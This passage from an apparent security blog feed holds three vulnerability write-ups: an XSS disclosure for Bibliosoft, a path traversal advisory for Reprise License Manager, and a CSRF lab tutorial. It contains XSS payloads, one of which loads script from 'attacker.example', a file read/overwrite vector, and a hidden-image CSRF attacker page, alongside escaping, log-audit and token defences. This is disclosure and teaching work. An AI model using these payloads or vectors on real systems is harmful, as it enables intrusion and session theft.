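// Vulnerable: the value is concatenated into the markup unchanged.
function renderVulnerable(db) {
  return `<input type="hidden" name="db" value="${db}">`;
}

// Still vulnerable: upper-casing the value before reflecting it. Tag and
// attribute names are case-insensitive in HTML, so <SCRIPT SRC=...> loads
// exactly like <script src=...>; only the URL has to survive upper-casing.
function renderUppercased(action) {
  return `<input type="hidden" name="action" value="${String(action).toUpperCase()}">`;
}

// Hardened: encode the characters that can change the HTML context. Because
// the template quotes the attribute value this is sufficient for this sink;
// a JavaScript or URL context would need its own encoder.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function htmlEscape(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderSafe(db) {
  return `<input type="hidden" name="db" value="${htmlEscape(db)}">`;
}

// Counts start tags beyond the single <input> the template itself emits.
// A real test suite would use an HTML parser; counting '<x' is enough to
// show whether the reflected value created a new element.
function injectedTagCount(html) {
  const templateTags = 1;
  return (html.match(/<[a-zA-Z]/g) || []).length - templateTags;
}

// Constructed payloads (not taken from the post). The second one is written
// so that upper-casing does not break it: the host name is case-insensitive
// and the path contains only digits.
const PAYLOAD_INLINE = 'BIBLIO"><script>alert(1)</script>';
const PAYLOAD_REMOTE = 'EXTRASEARCH"><script src="//attacker.example/1"></script>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderVulnerable(PAYLOAD_INLINE));   // a new <script> element appears
  console.log(renderUppercased(PAYLOAD_REMOTE));   // <SCRIPT SRC=...> still executes
  console.log(renderSafe(PAYLOAD_INLINE));         // payload is rendered as text
}
```

&lt;p&gt;Run it with node to see the three renderings side by side. The point of injectedTagCount is that the vulnerable and upper-cased renderings both gain an element the template never had, while the escaped one does not; escaping at the output point is the fix, not filtering or case changes on the input.&lt;/p&gt;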

&lt;p&gt;&lt;strong&gt;Concluding&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;An attacker can exploit this vulnerability to extract additional information from a client’s session on the website. If for any reason you need to have this product exposed, mitigations must be put in place to block this attack. There may also be other injection points in the software, but that was not thoroughly tested.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Timeline&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;27/08/2018 - First contact to request security contact of the company&lt;/li&gt;
  &lt;li&gt;28/08/2018 - First response&lt;/li&gt;
  &lt;li&gt;31/08/2018 - Details sent&lt;/li&gt;
  &lt;li&gt;31/08/2018 - Response (deprecated 5 years ago) won’t fix&lt;/li&gt;
  &lt;li&gt;31/08/2018 - Query to know whether clients are going to be notified&lt;/li&gt;
  &lt;li&gt;22/10/2018 - No Response, contacted CSIRT&lt;/li&gt;
  &lt;li&gt;XX/12/2018 - Won’t fix, clients being informed&lt;/li&gt;
  &lt;li&gt;01/02/2019 - Disclosing it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;References&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)&quot;&gt;OWASP-XSS&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet&quot;&gt;OWASP-XSS Mitigation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I do not promote the exploitation of this vulnerability for malicious purposes. My research was only an academic one without interference or harm to any people.&lt;/p&gt;
</description>
        <pubDate>Fri, 01 Feb 2019 00:00:00 +0000</pubDate>
        <link>http://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html</guid>
        
        
        <category>web</category>
        
        <category>XSS</category>
        
      </item>
    
      <item>
        <title>Path Traversal Reprise Licence Manager (CVE-2018-5716)</title>
        <description>&lt;p&gt;This post will demonstrate a vulnerability in the &lt;strong&gt;Reprise Licence Manager (RLM) version 11.0&lt;/strong&gt;  found while doing a pentest. The vulnerability in question allows a user with access to the Web Management Interface to access (and sometimes write) files in the System.&lt;/p&gt;

&lt;p&gt;This allows an attacker to read files, and therefore gather additional information about the system, and also to delete the log file of the RLM server (when the process has write permission on it).&lt;/p&gt;

&lt;p&gt;This situation was reported to &lt;strong&gt;Reprise Software Inc.&lt;/strong&gt; and was promptly considered &lt;strong&gt;NOT A VULNERABILITY&lt;/strong&gt;, since the application is meant to be installed as a non-privileged user. However, I strongly disagree, since an attacker can still read any file that is readable by all users on the system. This issue could easily be resolved by keeping an allow-list of files the application may access and restricting the Web Application to those.&lt;/p&gt;

&lt;p&gt;A &lt;strong&gt;CVE (CVE-2018-5716)&lt;/strong&gt; was issued for this vulnerability and is going to be released soon.&lt;/p&gt;

&lt;p&gt;Without any further ado, here are the details:&lt;/p&gt;

&lt;p&gt;An attacker who can access the Web Management Interface can edit license files, and the license file to edit is identified by an arbitrary path that the user controls. Changing the path to some other file gives access to that file.&lt;/p&gt;

&lt;p&gt;One interesting aspect is that you can choose any extension for the file, .EXE included, so an attacker could write executable files. However, &lt;strong&gt;the characters [&amp;lt;&amp;gt;&amp;amp;] aren’t allowed&lt;/strong&gt;, so introducing web shells won’t be so easy.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_exe_upload.png&quot; alt=&quot;Uploading an EXE Extension File&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The vector this vulnerability refers to is located at http(s)://ipOfServer:port&lt;strong&gt;/goform/edit_lf_get_data&lt;/strong&gt;. Analyzing the request with Burp, we can see the parameter in which the full path of a file is being sent:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_path_trans.png&quot; alt=&quot;Request with potential Arbitrary file Read&quot; /&gt;&lt;/p&gt;

&lt;p&gt;If we change the path to some file outside the directory structure, for example the hosts file on Windows, we can see the file presented in the response in the web browser:
&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_path_hosts.png&quot; alt=&quot;Arbitrary File Read&quot; /&gt;
&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_exploited.png&quot; alt=&quot;Arbitrary File Read 2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As we can see in the picture above, a file outside the web root was accessed without any control. The matter is made worse by the fact that the application accepts any file path typed directly into the user interface, which is why Reprise Software Inc. does not consider this a vulnerability. However, an attacker can overwrite important files, such as the application log, hence hiding their tracks. A solution is to limit file access to the application’s directory structure or to a dedicated license folder, and to refuse to write files with other extensions.&lt;/p&gt;

&lt;p&gt;Next I present the form where you can input any file to be read (and then overwritten, given the permissions):
&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_arb1.png&quot; alt=&quot;Arbitrary File Read 3&quot; /&gt;
&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_arb2.png&quot; alt=&quot;Arbitrary File Read 4&quot; /&gt;&lt;/p&gt;

&lt;p&gt;For testing and for the record, next is the about page, which states the product version:
&lt;img src=&quot;http://www.0x90.zone/images/reprise_path_traversal/reprise_about.png&quot; alt=&quot;About&quot; /&gt;&lt;/p&gt;

&lt;p&gt;In conclusion, this is my opinion &lt;strong&gt;only&lt;/strong&gt;: this behavior represents a danger, since the attacker can read arbitrary data provided it is stored on the disk &lt;strong&gt;AND&lt;/strong&gt; the application has permission to read it. A lot of information can be retrieved from files with permissive access rights. The recommendation the company gave me is to lower the permission level so the application can’t read critical files, but I think that solution won’t be enough, and based on OWASP Path Traversal (&lt;a href=&quot;https://www.owasp.org/index.php/Path_Traversal&quot;&gt;OWASP Path Traversal&lt;/a&gt;) it is still considered a vulnerability. There is also the possibility of disabling the interface.&lt;/p&gt;

&lt;p&gt;I hereby do not encourage exploitation of this vulnerability for malicious purposes; my research was only an academic one without interference or harm to any people.&lt;/p&gt;
</description>
        <pubDate>Fri, 16 Feb 2018 16:20:51 +0000</pubDate>
        <link>http://www.0x90.zone/web/path-traversal/2018/02/16/Path-Traversal-Reprise-LM.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/web/path-traversal/2018/02/16/Path-Traversal-Reprise-LM.html</guid>
        
        
        <category>web</category>
        
        <category>path-traversal</category>
        
      </item>
    
      <item>
        <title>CSRF and COORS the misconfiguration that will own you.</title>
        <description>&lt;p&gt;A lot of requendations about security are “don’t browse sites that you don’t know”. People can ask why is that. How visiting a website that i don’t fully trust can compromise me or other sites that I use.&lt;/p&gt;

&lt;p&gt;Today I embarked on a quest to try to show people (and some shitty computer security firms that don’t consider this a vulnerability) why that’s absolutely wrong. Shortly I will set up an environment and perform the attack on a small lab to show you how to use it and how to defend against it.
CSRF, or cross-site request forgery, is an attack where one website makes an HTTP request to another site and triggers an action there. This action can be changing a password or creating a new user on the application (useful if there is an administration panel). This vulnerability appears in many security devices, and the attacker can exploit it to whatever extent the vulnerable action allows; however, some criteria are required for it to be successful:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;The attacker must know the complete address of the service.&lt;/li&gt;
  &lt;li&gt;The parameters for the call should be known, or at least deterministic.&lt;/li&gt;
  &lt;li&gt;The victim should already be logged in.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The first criterion can be met through inside knowledge, OSINT (Open Source Intelligence) or scanning. A simple case: imagine you are a pentester already on the network, and you see a known security appliance with a CSRF vulnerability in its “add user” function that would give you high-privilege control over the network perimeter. You know the appliance (software), the version and the address, so it should be fairly straightforward to attack.&lt;/p&gt;

&lt;p&gt;The second criterion follows from the first: once you identify the software, it is easy to find the request that triggers the action. You can set up Burp to intercept the browser’s requests, or simply use the developer tools of the main browsers (Chrome/Firefox), open the ‘Network’ tab and inspect the traffic generated by the web application. By clicking on a request you can inspect all its parameters and check whether there is a “csrf_token” parameter that would block our attack.&lt;/p&gt;

&lt;p&gt;The third criterion is partly a matter of chance. If it is a portal we know the victim uses, we will probably achieve our goal; otherwise we may not. Other techniques can be used, like traffic inspection to check whether the victim is communicating with the server (even for an SSL/TLS connection we can still check the destination IP).&lt;/p&gt;

&lt;p&gt;In some environments with federated authentication (or similar), where the login is shared by all web applications on the same domain, the session cookie still exists even if the victim never logged in to the specific portal, and it can be used to access that portal nevertheless. I say “can” because some federated authentication services may require a confirmation before allowing the specific web application to continue.&lt;/p&gt;

&lt;p&gt;Now, with that in mind, let’s begin with our scenario. We have two websites: the official site (at 192.168.155.114) and the attacker’s website (at 192.168.155.133). The official site requires the user to log in to make a transaction. For the sake of brevity the official website has a predefined login, with the username “victim” and the password “pass”; when a transaction is requested, a session variable is stored so that no further submissions are accepted. Please disregard the other vulnerabilities on the site, like the username and password being submitted via a GET request; we are not focusing on that right now. Here is the code for the official website:&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;nb&quot;&gt;session_start&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;logedin&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])){&lt;/span&gt;

    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;username&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;password&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])){&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;username&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;victim&apos;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;  &lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;password&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;pass&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;){&lt;/span&gt;
            &lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;logedin&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;

        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;&amp;lt;form action=&quot;/bankpage/index.php&quot;&amp;gt;
	  Username:&amp;lt;br&amp;gt;
	  &amp;lt;input type=&quot;text&quot; name=&quot;username&quot;&amp;gt;&amp;lt;br&amp;gt;
	  Password:&amp;lt;br&amp;gt;
		  &amp;lt;input type=&quot;password&quot; name=&quot;password&quot;&amp;gt;
	&amp;lt;input type=&quot;submit&quot;&amp;gt;
		&amp;lt;/form&amp;gt;
			&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;logedin&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;logedin&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;transactions&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])){&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;Transaction
		&amp;lt;br&amp;gt;&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;transactions&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;

    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;transaction_number&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])){&lt;/span&gt;
            &lt;span class=&quot;nv&quot;&gt;$_SESSION&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;transactions&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;Transaction Made=&apos;&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&apos;transaction_number&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;
            &lt;span class=&quot;nb&quot;&gt;header&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Refresh:0&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

        &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;No transactions have been made&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;


            &lt;span class=&quot;c1&quot;&gt;//Make transaction&lt;/span&gt;
            &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;
	&amp;lt;form action=&quot;/bankpage/index.php&quot;&amp;gt;
	&amp;lt;input type=&quot;text&quot; name=&quot;transaction_number&quot; /&amp;gt;
	&amp;lt;input type=&quot;Submit&quot; value=&quot;Submit&quot; /&amp;gt;
	&amp;lt;/form&amp;gt;
	&apos;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;#DONT FORGET THE PHP TAGS!&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;The attacker’s website is the one that, once visited, makes the cross-site request and triggers the transaction. It’s as simple as that: just visit the website and, before you know it, the attack has already been done. Here is the code for the attacker’s site:&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;h1&amp;gt;&lt;/span&gt; ATTACKERS &lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;

&lt;span class=&quot;nt&quot;&gt;&amp;lt;img&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;src=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;http://192.168.155.114/bankpage/index.php?transaction_number=1337&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;width=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;0&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;height=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;0&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;border=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;0&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;The attack proceeds as follows: the victim accesses the official website and logs in.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/csrf/official_login.PNG&quot; alt=&quot;Official Website&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As we see in the next image, no transaction has been made yet.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/csrf/victim_transactions.PNG&quot; alt=&quot;After the login&quot; /&gt;&lt;/p&gt;

&lt;p&gt;By visiting the attacker’s website we trigger the attack; when we go back to the official site we see a transaction that we did not knowingly make.
&lt;img src=&quot;http://www.0x90.zone/images/csrf/attack.PNG&quot; alt=&quot;Attack&quot; /&gt;&lt;/p&gt;

&lt;p&gt;When we refresh the official page we now see the transaction that has been made.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/csrf/attack_done.PNG&quot; alt=&quot;Attack Done&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now for the fun part. There are many ways to do this easily. The first is creating an img tag whose source points at the address to attack. If we need a POST request, we can build a form with the same fields and submit it with JavaScript as soon as the page loads.
One thing to keep in mind is that browsers nowadays are more “intelligent” than a few years back: when the attacker’s page fires an AJAX request at the target, the browser refuses to let the attacker’s script read the response. The reason for this is CORS (Cross-Origin Resource Sharing): the target must explicitly allow the requesting origin in its response headers, otherwise the response stays hidden from the script (and for non-simple requests the browser sends a preflight first). Sites that expose an external API consumed by their own front end have to implement CORS for modern browsers to work, and an API that reflects any origin while allowing credentials hands the attacker the response as well. Note that CORS does not stop the request itself from being sent with the victim’s cookies, so an action-only CSRF like the one above still succeeds, and none of this applies to HTML tags such as img or form, since almost everyone loads external resources, images at least, from other origins.&lt;/p&gt;

&lt;p&gt;To detect this attack on your website you can simply check the logs of your API for an external HTTP Referer on the requests that change state. If a website you know, or suspect, is being used for this attack, it will show up as a different Referer. Bear in mind that the Referer is often absent (privacy settings and Referrer-Policy strip it), so a missing Referer is not proof of a legitimate request; on modern browsers the Origin header, which is attached to cross-origin POSTs, is the more reliable field to compare.&lt;/p&gt;
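&lt;p&gt;As an added example (not the post’s own code), here is the Referer check from the paragraph above run over a handful of constructed Apache combined-format log lines for the lab site at 192.168.155.114. Only requests to the state-changing endpoint (the one carrying transaction_number) are judged: a Referer on another host is flagged as cross-site, a same-host Referer is accepted, and an absent Referer is reported as such rather than treated as clean. The log lines, the STATE_CHANGING marker list and the function names are assumptions made for the example.&lt;/p&gt;

```python
import re
from urllib.parse import urlsplit

# Constructed sample (not a real capture) of Apache "combined" log lines for
# the lab site. Line 2 is the request the attacker page at 192.168.155.133
# made the victim's browser send; line 3 is a real submission from the site's
# own form; line 4 has the Referer stripped by the browser.
SAMPLE_LOG = """\
192.168.155.1 - - [11/Dec/2017:22:41:10 +0000] "GET /bankpage/index.php HTTP/1.1" 200 498 "http://192.168.155.114/bankpage/index.php" "Mozilla/5.0"
192.168.155.1 - - [11/Dec/2017:22:42:17 +0000] "GET /bankpage/index.php?transaction_number=1337 HTTP/1.1" 200 530 "http://192.168.155.133/" "Mozilla/5.0"
192.168.155.1 - - [11/Dec/2017:22:42:30 +0000] "GET /bankpage/index.php?transaction_number=42 HTTP/1.1" 200 530 "http://192.168.155.114/bankpage/index.php" "Mozilla/5.0"
192.168.155.1 - - [11/Dec/2017:22:43:02 +0000] "GET /bankpage/index.php?transaction_number=7 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD path protocol", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$'
)

# Substrings that identify state-changing requests in this lab (assumption).
# A foreign Referer on a plain page view is just an inbound link, not an attack.
STATE_CHANGING = ("transaction_number=",)


def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, ts, method, path, status, referer = m.groups()
    return {"ip": ip, "ts": ts, "method": method, "path": path,
            "status": int(status), "referer": referer}


def classify_referer(referer, site_host):
    """'same', 'cross' or 'missing' (Apache logs an absent Referer as "-")."""
    if referer in ("", "-"):
        return "missing"
    host = urlsplit(referer).netloc
    return "same" if host == site_host else "cross"


def audit_state_changes(log_text, site_host):
    """(kind, ip, path, referer) for every state-changing request in the log."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if not any(marker in rec["path"] for marker in STATE_CHANGING):
            continue
        kind = classify_referer(rec["referer"], site_host)
        findings.append((kind, rec["ip"], rec["path"], rec["referer"]))
    return findings


def csrf_candidates(log_text, site_host):
    """Only the cross-site findings: the lines to investigate first."""
    return [f for f in audit_state_changes(log_text, site_host) if f[0] == "cross"]


if __name__ == "__main__":
    for finding in audit_state_changes(SAMPLE_LOG, "192.168.155.114"):
        print(finding)
```

&lt;p&gt;This works on the lab because the transaction travels in the query string, which the access log records; for a POST-based action only the path is logged, so the STATE_CHANGING markers would have to match the path of the action instead.&lt;/p&gt;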

&lt;p&gt;To fully mitigate this issue we should employ CSRF token verification on every form that triggers an action in the database. Frameworks such as Django already require the token by default in every form; for Apache lovers there is mod_csrf (&lt;a href=&quot;http://mod-csrf.sourceforge.net/&quot;&gt;mod_csrf&lt;/a&gt;), and in code there is PHP_CSRF_Guard (&lt;a href=&quot;https://www.owasp.org/index.php/PHP_CSRF_Guard&quot;&gt;PHP_CSRF_GUARD&lt;/a&gt;). Ultimately the web developer should use this by default while developing the web application. Since the attacker cannot easily obtain the token, he cannot submit the form. Modern browsers additionally honour the SameSite cookie attribute, which keeps the session cookie off cross-site requests; it is worth setting, but as defence in depth rather than a replacement for the token.&lt;/p&gt;
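&lt;p&gt;An added example, not the post’s PHP and not any of the libraries linked above, that models the lab’s transaction handler in Python twice: once with the lab’s behaviour and once with the synchronizer-token check described in the paragraph above, plus an Origin/Referer check and a POST-only rule. A request is a dict with method, params, headers and a session dict standing in for PHP’s $_SESSION; the request shape, the function names and the rejection strings are assumptions made for the example, while the host addresses and the “logedin”/“transactions” keys are the lab’s.&lt;/p&gt;

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_HOST = "192.168.155.114"   # the lab's official site
ATTACKER = "http://192.168.155.133/"


def vulnerable_transaction(request):
    """The lab behaviour: any logged-in request carrying transaction_number is honoured."""
    session = request["session"]
    if not session.get("logedin"):
        return "not logged in"
    number = request["params"].get("transaction_number")
    if number is None:
        return "no transaction"
    session["transactions"] = "Transaction Made=" + number
    return session["transactions"]


def issue_csrf_token(session):
    """Synchronizer token: a random secret per session, kept server side and
    rendered into the form as a hidden field. The attacker's page cannot read
    it because the browser will not let another origin read the form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def csrf_token_valid(session, submitted):
    expected = session.get("csrf_token")
    if expected is None or not isinstance(submitted, str):
        return False
    # constant-time comparison so the token cannot be guessed byte by byte
    return hmac.compare_digest(expected, submitted)


def origin_allowed(headers, site_host):
    """Reject requests whose Origin (or, failing that, Referer) names another
    host. Neither header present is tolerated: privacy settings strip them,
    and the token check below still stands on its own."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:
            return urlsplit(value).netloc == site_host
    return True


def hardened_transaction(request, site_host=SITE_HOST):
    session = request["session"]
    if not session.get("logedin"):
        return "not logged in"
    if request["method"] != "POST":
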